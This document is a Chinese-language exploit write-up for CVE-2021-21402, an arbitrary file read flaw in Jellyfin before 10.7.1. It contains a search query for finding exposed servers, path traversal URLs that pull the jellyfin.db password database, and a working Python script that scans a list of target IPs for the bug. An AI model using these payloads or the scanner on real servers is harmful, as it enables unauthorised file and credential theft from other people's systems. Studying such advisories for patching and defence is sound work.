# Jellyfin 任意文件读取漏洞 CVE-2021-21402 ## 漏洞描述 Jellyfin是一个免费软件媒体系统。在10.7.1版之前的Jellyfin中,带有某些终结点的精心设计的请求将允许从Jellyfin服务器的文件系统中读取任意文件。当Windows用作主机OS时,此问题更为普遍。暴露于公共Internet的服务器可能会受到威胁。在版本10.7.1中已修复此问题。解决方法是,用户可以通过在文件系统上实施严格的安全权限来限制某些访问,但是建议尽快进行更新。 ## 漏洞影响 ``` Jellyfin < 10.7.1 ``` ## 网络测绘 ``` title='Jellyfin' || body='http://jellyfin.media' ``` ## 漏洞复现 无论是`/Audio/{Id}/hls/{segmentId}/stream.mp3`和`/Audio/{Id}/hls/{segmentId}/stream.aac`路线允许任意文件在Windows上读取。可以`{segmentId}`使用Windows路径分隔符`\`(对`%5C`URL进行编码)将路由的一部分设置为相对或绝对路径。最初,攻击者似乎只能读取以`.mp3`和`.aac`结尾的文件。但是,通过在URL路径中使用斜杠 Path.GetExtension(Request.Path)`返回一个空扩展名,从而获得对结果文件路径的完全控制。的`itemId,因为它没有使用也没有关系。该问题不仅限于Jellyfin文件,因为它允许从文件系统读取任何文件。 ```java // Can't require authentication just yet due to seeing some requests come from Chrome without full query string // [Authenticated] // [1] [HttpGet("Audio/{itemId}/hls/{segmentId}/stream.mp3", Name = "GetHlsAudioSegmentLegacyMp3")] [HttpGet("Audio/{itemId}/hls/{segmentId}/stream.aac", Name = "GetHlsAudioSegmentLegacyAac")] //... public ActionResult GetHlsAudioSegmentLegacy([FromRoute, Required] string itemId, [FromRoute, Required] string segmentId) { // TODO: Deprecate with new iOS app var file = segmentId + Path.GetExtension(Request.Path); //[2] file = Path.Combine(_serverConfigurationManager.GetTranscodePath(), file); return FileStreamResponseHelpers.GetStaticFileResult(file, MimeTypes.GetMimeType(file)!, false, HttpContext); } ``` 使用如下请求将会读取带有密码的数据库文件 ```plain http://xxx.xxx.xxx.xxx /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ ``` 另一处代码如下 ```java // Can't require authentication just yet due to seeing some requests come from Chrome without full query string // [Authenticated] //[1] [HttpGet("Videos/{itemId}/hls/{playlistId}/{segmentId}.{segmentContainer}")] //... public ActionResult GetHlsVideoSegmentLegacy( [FromRoute, Required] string itemId, [FromRoute, Required] string playlistId, [FromRoute, Required] string segmentId, [FromRoute, Required] string segmentContainer) { var file = segmentId + Path.GetExtension(Request.Path); //[2] var transcodeFolderPath = _serverConfigurationManager.GetTranscodePath(); file = Path.Combine(transcodeFolderPath, file); //[3] var normalizedPlaylistId = playlistId; var filePaths = _fileSystem.GetFilePaths(transcodeFolderPath); // Add . to start of segment container for future use. segmentContainer = segmentContainer.Insert(0, "."); string? playlistPath = null; foreach (var path in filePaths) { var pathExtension = Path.GetExtension(path); if ((string.Equals(pathExtension, segmentContainer, StringComparison.OrdinalIgnoreCase) || string.Equals(pathExtension, ".m3u8", StringComparison.OrdinalIgnoreCase)) //[4] && path.IndexOf(normalizedPlaylistId, StringComparison.OrdinalIgnoreCase) != -1) //[5] { playlistPath = path; break; } } return playlistPath == null ? NotFound("Hls segment not found.") : GetFileResult(file, playlistPath); } ``` 该`/Videos/{Id}/hls/{PlaylistId}/{SegmentId}.{SegmentContainer}`路由允许在Windows上读取未经身份验证的任意文件。可以`{SegmentId}.{SegmentContainer}`使用Windows路径分隔符`\`(对`%5C`URL进行编码)将路由的一部分设置为相对或绝对路径。在`SegmentId`从和文件扩展名`Path`被级联。结果`file`用作`Path.Combine`[3]的第二个参数。但是,如果第二个参数是绝对路径,则第一个参数to将`Path.Combine`被忽略,而得到的路径仅是绝对路径`file`。 POC如下,下载同样的文件 ```plain http://xxx.xxx.xxx.xxx/Videos/anything/hls/m/..%5Cdata%5Cjellyfin.db ``` 如上为证明漏洞存在和可利用性,详情链接参考 https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/ ## 漏洞POC ```python import requests import sys import random import re from requests.packages.urllib3.exceptions import InsecureRequestWarning def title(): print('+------------------------------------------') print('+ \033[34mVersion: Jellyfin < 10.7.1 \033[0m') print('+ \033[36m使用格式: python3 poc.py \033[0m') print('+ \033[36mFile >>> ip.txt \033[0m') print('+------------------------------------------') def POC_1(target_url): vuln_url = target_url + "/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", } try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=2) if response.status_code == 200 and "file" in response.text and "extension" in response.text and "font" in response.text: print("\033[32m[o] 目标 {} 存在漏洞(读取 windows/win.ini), 链接为:{} \033[0m".format(target_url, vuln_url)) else: print("\033[31m[x] 目标 {} 不存在漏洞 \033[0m".format(target_url)) except Exception as e: print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url)) def Scan(file_name): with open(file_name, "r", encoding='utf8') as scan_url: for url in scan_url: if url[:4] != "http": url = "http://" + url url = url.strip('\n') try: POC_1(url) except Exception as e: print("\033[31m[x] 请求报错 \033[0m".format(e)) continue if __name__ == '__main__': title() file_name = str(input("\033[35mPlease input Attack File\nFile >>> \033[0m")) Scan(file_name) ```